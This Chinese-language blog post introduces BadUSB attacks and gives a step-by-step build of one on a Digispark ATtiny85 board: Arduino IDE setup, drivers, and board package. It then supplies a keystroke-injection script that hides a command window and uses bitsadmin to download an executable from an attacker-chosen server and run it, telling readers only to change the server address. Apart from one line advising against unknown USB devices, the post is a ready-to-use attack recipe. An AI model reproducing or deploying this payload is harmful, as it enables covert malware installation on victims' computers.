请注意,本文编写于 912 天前,最后修改于 912 天前,其中某些信息可能已经过时。
BadUSB 介绍
BadUSB攻击是一种利用USB固件中的固有漏洞的攻击,将一个写入了恶意代码的定制USB设备,例如U盘,插入受害者电脑,它会伪装成HID设备(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行操作。它由Karsten Nohl 和 Jakob Lell 在2014年BlackHat大会上提出,特点是恶意代码存在于U盘的固件中,杀毒软件无法访问固件区域,也就没有办法查杀这些恶意代码。应对这一攻击最有效的方法就是不要随意插入未知、不受信任的USB设备。
BadUSB 制作
我用的是Attiny85微型USB接口digispark开发板扩展板
可在淘宝自行购买 这里就不做推荐了
1、装 arduino 的 IDE
首先在下载arduino并安装
链接:https://downloads.arduino.cc/arduino-1.8.19-windows.exe
2、下载驱动
下载驱动
链接:https://i.tianmoy.cn/qt/Digistump.Drivers.zip
注:如果是 64 位操作系统请选择 DPinst64.exe,否则请选择 DPinst.exe
3、配置环境
点击文件--首选项
开发板管理器网址(国外):http://digistump.com/package_digistump_index.json
开发板管理器网址(国内):https://i.tianmoy.cn/qt/package_digistump_index.json
点击工具--开发板管理器
等待下载完成,下载失败就用国内的
类型选择贡献
安装完成后开发板选择这个
3、代码部分
远程下载执行代码,更改一下服务器地址就好
DELAY 1000
GUI r
DELAY 1000
STRING cmd ./T:01 /K mode CON: COLS=16 LINES=1
ENTER
DELAY 3000
STRING cmd.exe /c bitsadmin /transfer eH /priority foreground EXE程序下载地址 %USERPROFILE%\Tianmoy.exe && start %USERPROFILE%\Tianmoy.exe
ENTER
注:这些需要在Dckuino.js上面转换
Board选择Digispark然后点击Compile即可
结束
end